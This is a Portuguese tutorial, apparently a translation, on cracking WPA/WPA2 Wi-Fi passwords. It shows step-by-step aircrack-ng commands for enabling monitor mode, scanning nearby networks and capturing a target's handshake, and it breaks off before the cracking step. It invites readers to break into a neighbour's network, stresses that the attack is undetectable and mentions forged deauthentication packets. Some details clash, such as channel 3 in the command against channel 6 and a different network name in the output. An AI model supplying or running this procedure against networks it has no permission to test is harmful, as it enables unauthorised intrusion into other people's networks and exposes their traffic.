
Quebrar roteadores Wi-Fi WPA/WPA2 com Airodump-ng e Aircrack-ng/Hashcat
Crackeie roteadores Wi-Fi WPA/WPA2 com Airodump-ng e Aircrack-ng/Hashcat.
Este é um breve tutorial prático que ilustra como crackear redes Wi-Fi que são protegidas usando senhas fracas. Não é exaustivo, mas deve ser informação suficiente para você testar a segurança da sua própria rede ou invadir uma próxima. O ataque descrito abaixo é inteiramente passivo (apenas escuta, nada é transmitido do seu computador) e é impossível de detectar, desde que você não use a senha que crackeou. Um ataque opcional de desautenticação ativo pode ser usado para acelerar o processo de reconhecimento e é descrito no final deste documento.
Se você está familiarizado com este processo, pode pular as descrições e ir diretamente para uma lista dos comandos usados no final. Para uma variedade de sugestões e métodos alternativos, veja o apêndice. O neal1991 e o tiiime também forneceram gentilmente traduções para este documento e o apêndice em chinês, se você preferir essas versões.
AVISO: Este software/tutorial é apenas para fins educacionais. Não deve ser usado para atividades ilegais. O autor não é responsável pelo seu uso. Não seja um babaca.
Este tutorial assume que você:
sudo apt-get install aircrack-ngComece listando as interfaces wireless que suportam modo monitor com:
airmon-ng
Se você não vir uma interface listada, sua placa wireless não suporta modo monitor 😞
Vamos supor que o nome da sua interface wireless seja wlan0, mas certifique-se de usar o nome correto se for diferente. Em seguida, colocaremos a interface em modo monitor:
airmon-ng start wlan0
Execute iwconfig. Agora você deve ver uma nova interface de modo monitor listada (provavelmente mon0 ou wlan0mon).
Comece a escutar os Beacon frames 802.11 transmitidos por roteadores wireless próximos usando sua interface de monitor:
airodump-ng mon0
Você deve ver uma saída semelhante à abaixo.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Para os propósitos desta demonstração, escolheremos crackear a senha da minha rede, "hackme". Lembre-se do endereço MAC BSSID e do número do canal (CH) conforme exibido pelo airodump-ng, pois precisaremos de ambos para o próximo passo.
O WPA/WPA2 usa um handshake de 4 vias para autenticar dispositivos na rede. Você não precisa saber nada sobre o que isso significa, mas precisa capturar um desses handshakes para crackear a senha da rede. Esses handshakes ocorrem sempre que um dispositivo se conecta à rede, por exemplo, quando seu vizinho volta do trabalho. Capturamos esse handshake direcionando o airmon-ng para monitorar o tráfego na rede alvo usando o canal e os valores do bssid descobertos no comando anterior.
# substitua -c e --bssid pelos valores da sua rede alvo
# -w especifica o diretório onde salvaremos a captura de pacotes
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Agora esperamos... Depois de capturar um handshake, você deve ver algo como [ WPA handshake: bc:d3:c9:ef:d2:67 no canto superior direito da tela, logo à direita da hora atual.
Se você estiver impaciente e se sentir confortável em usar um ataque ativo, pode forçar dispositivos conectados à rede alvo a se reconectarem, enviando pacotes de desautenticação maliciosos para eles. Isso geralmente resulta na captura de um handshake de 4 vias. Veja a seção de ataque de desautenticação abaixo para mais informações.
Depois de capturar um handshake, pressione ctrl-c para sair do airodump-ng. Você deve ver um arquivo .cap no diretório onde disse ao airodump-ng para salvar a captura (provavelmente chamado -01.cap). Usaremos este arquivo de captura para crackear a senha da rede. Gosto de renomear este arquivo para refletir o nome da rede que estamos tentando crackear:
mv ./-01.cap hackme.cap